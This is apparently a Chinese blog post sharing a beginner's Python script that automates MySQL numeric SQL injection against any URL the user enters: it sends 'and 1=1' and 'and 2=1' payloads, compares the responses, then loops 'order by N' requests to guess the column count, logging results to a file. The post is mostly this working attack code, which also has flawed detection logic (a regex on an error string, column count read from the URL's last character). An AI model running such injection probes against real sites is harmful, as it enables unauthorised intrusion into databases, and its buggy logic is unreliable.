python打造一个Mysql数字类型注入脚本(1)

前言：

总是想写一个sql注入脚本，但是之前的那些都不行。

这次做好了准备，然后嘿嘿嘿。

准备：

sql注入的基础知识

熟悉怎么判断

正文：

思路概念图：

这里我没有限制用户输入，不限制的话可能会 @&#@*#&@* = =

代码：

import requests
from bs4 import BeautifulSoup
import time
import re
import sys
def user():
    wailtfor=input('请输入你要进行sql注入测试的url：')
    print('------开启第一重验证------')
    url="{}".format(wailtfor)
    headers={'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.181 Safari/537.36'}
    request=requests.get(url=url,headers=headers,timeout=6)
    if request.status_code != 200:
        print('[-]抱歉该url十分的不稳定，退出程序中......')
        time.sleep(1)
        sys.exit()
    else:
        print('[+]第一重验证已经完成，目标是稳定的')
        journal=open('journal.txt','w',encoding='utf-8')
        journal.write('{}是稳定的
'.format(url))
        journal.write('下一步进行判断是否存在注入')
        journal.close()

    print('------开启第二重测试------')

    def ceshi():
        pay1 = '%20and%201=1'
        pay2 = '%20and%202=1'
        Testinjection1 = request.url + pay1
        Testinjection2=request.url+pay2
        print('-------尝试数字型注入------')
        print(Testinjection1)
        print(Testinjection2)
        Testg=requests.get(Testinjection1,headers=headers)
        print(Testg.headers)
        Testg2=requests.get(Testinjection2,headers=headers)
        print(Testg2.headers)
        if Testg.text != Testg2.text:
            print('[+]数字型注入成功,用到的payload:{},{}'.format(pay1, pay2))
            journal2 = open('journal.txt', 'a')
            journal2.write('数字型注入成功,用到的payload:{},{}'.format(pay1, pay2))
            journal2.close()
            print('------开始猜字段数------')
        elif Testg.headers != Testg2.headers:
            print('[+]数字型注入成功,用到的payload:{},{}'.format(pay1,pay2),'可能存在注入点')
            journal2=open('journal.txt','a')
            journal2.write('数字型注入成功,用到的payload:{},{}'.format(pay1,pay2))
            journal2.close()
            print('------开始猜字段数------')
        else:
            print('[-]数字型注入失败')
            print('[!]尝试字符型注入')
            sys.exit()
        a='ooo'
        for s in range(1,100):
            if a=='xxx':break
            orpay=url+'%20order%20by%20{}'.format(s)
            res=requests.get(orpay,headers=headers)
            ewe=res.content
            lk=re.finditer('mysql_fetch_array()',str(ewe))
            for p in lk:
                print(str(p))
                g='''<_sre.SRE_Match object; span=(232, 249), match='mysql_fetch_array'>'''
                if str(p) == g:
                    print('字段数payload：', res.url)
                    dw = int(res.url[-1:])-1
                    print(type(dw))
                    print('字段数长度为:', dw)
                    a='xxx'
                else:
                    print('字段数payload：',res.url)
                    dw=int(res.url[-1:])-1
                    print('字段数长度为:',dw)
                    a='xxx'




    ceshi()

user()

　 测试结果如下：

 代码还有很多不足，诺各位大佬有什么好的意见请多多留言。 = =

最后送上一首歌：